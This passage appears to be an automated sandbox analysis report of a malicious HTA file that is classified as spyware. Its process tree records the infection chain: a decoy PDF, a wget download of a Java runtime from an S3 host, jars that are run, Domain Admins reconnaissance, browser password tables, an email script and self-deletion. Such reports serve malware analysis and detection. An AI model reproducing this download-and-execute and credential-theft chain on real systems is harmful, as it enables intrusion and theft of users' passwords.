Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA96868	19_2_6FA96868
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAE078C	19_2_6FAE078C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAAC793	19_2_6FAAC793
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAA273A	19_2_6FAA273A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAD2636	19_2_6FAD2636
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF066E	19_2_6FAF066E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB00506	19_2_6FB00506
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF8565	19_2_6FAF8565
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAB0464	19_2_6FAB0464
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF6456	19_2_6FAF6456
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAC6350	19_2_6FAC6350
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB0C280	19_2_6FB0C280
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA881BC	19_2_6FA881BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA56127	19_2_6FA56127
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAA201B	19_2_6FAA201B
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAC1EE1	19_2_6FAC1EE1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB0BE40	19_2_6FB0BE40
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF7D49	19_2_6FAF7D49
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAB5CBC	19_2_6FAB5CBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAE7C8C	19_2_6FAE7C8C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAADCFD	19_2_6FAADCFD
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB05C7F	19_2_6FB05C7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB0DC60	19_2_6FB0DC60
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB0BB90	19_2_6FB0BB90
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAB5BFF	19_2_6FAB5BFF
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FABDBC5	19_2_6FABDBC5
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAAFA03	19_2_6FAAFA03
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA9B9C5	19_2_6FA9B9C5
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAB9918	19_2_6FAB9918
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAC188C	19_2_6FAC188C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAE389E	19_2_6FAE389E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF367A	19_2_6FAF367A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAF55BE	19_2_6FAF55BE
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAEF54E	19_2_6FAEF54E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAB1481	19_2_6FAB1481
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAD936D	19_2_6FAD936D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA912EC	19_2_6FA912EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA7F269	19_2_6FA7F269
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAA725B	19_2_6FAA725B
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FAAD154	19_2_6FAAD154
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB0F0C0	19_2_6FB0F0C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34BF4	19_2_6FD34BF4
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD31801	19_2_6FD31801
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34650	19_2_6FD34650
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34650	19_2_6FD34650
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34650	19_2_6FD34650
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34650	19_2_6FD34650
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD34650	19_2_6FD34650
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD5D496	19_2_6FD5D496
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD33344	19_2_6FD33344
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD33360	19_2_6FD33360
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD33334	19_2_6FD33334
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD33080	19_2_6FD33080
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD33084	19_2_6FD33084
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD3302C	19_2_6FD3302C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F13330	19_2_73F13330
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F1A6E9	19_2_73F1A6E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F18D63	19_2_73F18D63

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 6FD6C0D1 appears 200 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 6FB45B84 appears 50 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 00E09EC0 appears 50 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 00E01116 appears 33 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 00E05AE8 appears 42 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 6D5CB740 appears 46 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 00E165F0 appears 32 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 6FD6C104 appears 80 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: String function: 6FD6C13A appears 94 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: String function: 00409B40 appears 61 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: String function: 00425CE0 appears 113 times

Source: wget.exe.0.dr

Static PE information: Number of sections : 11 > 10

Source: api-ms-win-core-localization-l1-2-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-fibers-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.15.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.spyw.evad.winHTA@65/379@0/13

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 16_2_00E05B72 GetLastError,FormatMessageA,_strlen,__vsnprintf,MessageBoxA,LocalFree,

16_2_00E05B72

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_0041C9D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,AdjustTokenPrivileges,GetLastError,		15_2_0041C9D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB440D3 _Java_sun_nio_fs_WindowsNativeDispatcher_AdjustTokenPrivileges@28,AdjustTokenPrivileges,GetLastError,		19_2_6FB440D3

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00422110 GetDiskFreeSpaceA,

15_2_00422110

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0041F1B0 OleInitialize,CoCreateInstance,AreFileApisANSI,MultiByteToWideChar,lstrcpyA,CoUninitialize,_errno,CoUninitialize,

15_2_0041F1B0

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\UProof

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\InvisiblePuttyDownloader.lock

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat"

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf"

Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: javaw.exe, 00000010.00000002.3207788399.0000000016804000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000003.3180205123.0000000016804000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: javaw.exe, 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmp, javaw.exe, 00000013.00000002.3225267269.000000006FB17000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: javaw.exe	String found in binary or memory: sun/launcher/LauncherHelper
Source: javaw.exe	String found in binary or memory: -help

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\malw.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\swiftcopy.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1584,i,9657057088581335983,7569918057650500138,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe "wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe "unzip.exe" "jre-1.8.zip" -d "jre"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\recovery.jar"
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\history.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar"
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Windows\SysWOW64\whoami.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Windows\SysWOW64\whoami.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\net.exe net group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\swiftcopy.pdf"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
